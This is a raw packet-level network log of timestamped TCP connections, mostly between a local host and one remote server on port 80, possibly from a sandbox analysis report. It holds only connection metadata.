Feb 12, 2021 01:50:14.978946924 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978984118 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979001999 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.979022980 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979059935 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979078054 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.979106903 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979149103 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979167938 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.979187012 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979227066 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.979242086 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.987488031 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987546921 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987579107 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.987588882 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987627029 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987649918 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.987678051 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987720966 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987734079 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.987760067 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987798929 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.987831116 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.055912971 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.055975914 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056015968 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056055069 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056093931 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056102991 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056126118 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056142092 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056143999 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056185961 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056226969 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056243896 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056266069 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056305885 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056319952 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056346893 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056386948 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056401014 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056426048 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056473970 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056474924 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056516886 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056554079 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056566000 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056593895 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056632042 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056648970 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056673050 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056713104 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056725025 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056752920 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056801081 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056802988 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056845903 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056884050 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056896925 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056924105 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056962013 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.056968927 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.056999922 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057039022 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057050943 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.057079077 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057126045 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.057126999 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057171106 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057209969 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057220936 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.057249069 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057287931 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057298899 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.057324886 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057364941 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057374954 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.057442904 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057485104 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057496071 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.057533026 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057574987 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.057585955 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.063972950 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.064054966 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.068872929 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.068918943 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.068958044 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.068991899 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.068994999 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.069034100 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.069044113 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.069072008 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.069144011 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.073983908 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.121527910 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.121664047 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:15.132472038 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132509947 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132534027 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132555962 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132572889 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132590055 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132605076 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132622004 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132633924 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132641077 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132658958 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132671118 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132674932 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132695913 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132698059 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132720947 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132720947 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132742882 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132745028 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132764101 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132783890 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132792950 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132810116 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132834911 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132838964 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132855892 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132877111 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132884026 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132898092 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132919073 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132930994 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132941008 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132952929 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.132961988 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.132987022 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133008957 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133013010 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133029938 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133050919 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133052111 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133071899 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133091927 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133094072 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133112907 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133133888 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133133888 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133158922 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133179903 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133181095 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133202076 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133219004 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133224964 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133245945 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133266926 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133276939 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133286953 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133302927 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.133307934 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.133357048 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.139008045 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.139033079 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.139134884 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.150216103 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.150247097 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.150275946 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.150302887 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.150315046 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.150330067 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.150347948 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.150365114 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.150410891 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.196223974 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208084106 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208125114 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208163977 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208203077 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208250046 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208260059 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208280087 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208292961 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208309889 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208332062 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208372116 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208383083 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208410025 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208447933 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208460093 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208487988 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208528042 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208542109 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208556890 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208575010 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208619118 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208622932 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208657026 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208698034 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208698988 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208736897 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208774090 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208787918 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208813906 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208851099 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208863020 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208899975 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208941936 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.208946943 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.208981037 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209018946 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209024906 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209074974 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209111929 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209124088 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209151030 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209188938 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209202051 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209225893 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209265947 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209297895 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209304094 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209352016 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209357977 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209424973 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209470034 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209485054 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209508896 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209547997 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209563971 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209588051 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209635973 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209640026 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209686041 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209724903 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209738016 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.209763050 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209800959 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.209815979 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232063055 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232127905 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232168913 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232167006 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232208014 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232218027 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232255936 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232300043 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232302904 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232337952 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232377052 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232393980 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232415915 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232453108 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232462883 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232492924 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232532024 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232549906 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232579947 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232623100 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232641935 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232662916 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232705116 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232708931 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232743979 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232781887 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232791901 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232820988 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232858896 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232865095 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232907057 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232949972 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.232955933 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.232986927 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233025074 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233035088 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.233063936 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233100891 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233110905 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.233139992 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233179092 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233184099 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.233227015 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233269930 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233274937 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.233308077 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233346939 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233357906 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.233422995 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233464956 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233484983 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.233504057 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233541965 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.233549118 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.272938967 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273024082 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273056030 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273087025 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273127079 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273174047 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273216963 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273231983 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273252964 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273255110 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273281097 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273293972 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273334026 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273344040 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273372889 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273418903 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273458004 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273500919 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273540974 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273545980 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273580074 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273618937 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273628950 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273655891 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273699045 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273703098 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273741961 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273787975 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273789883 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273833036 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273869991 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273880959 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.273909092 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273947954 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.273957968 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.277710915 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.277807951 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.284555912 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313604116 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313668966 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313708067 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313747883 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313762903 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.313786983 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313803911 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.313838959 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313847065 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.313884020 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313921928 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.313937902 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:15.313972950 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:15.314040899 CET	49774	80	192.168.2.4	35.228.31.40
